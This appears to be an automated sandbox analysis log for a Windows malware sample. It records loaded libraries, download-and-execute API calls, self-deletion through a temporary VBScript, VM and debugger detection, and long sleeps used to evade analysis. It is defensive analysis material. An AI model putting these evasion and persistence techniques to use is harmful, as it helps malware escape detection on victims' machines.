                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00434006 push ecx; ret 0_2_00434019
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004567F0 push eax; ret 0_2_0045680E
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00455EBF push ecx; ret 0_2_00455ED2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW,0_2_00406128
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Deletes itself after installation
                        Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Delayed program exit found
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0040E54F Sleep,ExitProcess,0_2_0040E54F
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_004198D2
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeWindow / User API: threadDelayed 699Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeWindow / User API: threadDelayed 8769Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeWindow / User API: foregroundWindowGot 1768Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7808Thread sleep count: 251 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7808Thread sleep time: -125500s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812Thread sleep count: 699 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812Thread sleep time: -2097000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812Thread sleep count: 8769 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812Thread sleep time: -26307000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000083E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: S}od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000083E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/S]
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000083E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(1
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_0-48060
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A66D
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00442564 mov eax, dword ptr fs:[00000030h]0_2_00442564
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0044E93E GetProcessHeap,0_2_0044E93E
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434178
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A66D
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00433B54
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00433CE7 SetUnhandledExceptionFilter,0_2_00433CE7
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00410F36
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00418764 mouse_event,0_2_00418764
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" Jump to behavior
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, logs.dat.0.drBinary or memory string: [Program Manager]
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00433E1A cpuid 0_2_00433E1A
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetLocaleInfoA,0_2_0040E679
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004510CA
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_004470BE
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004511F3
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004512FA
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004513C7
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004475A7
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00450A8F
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450D52
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450D07
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450DED
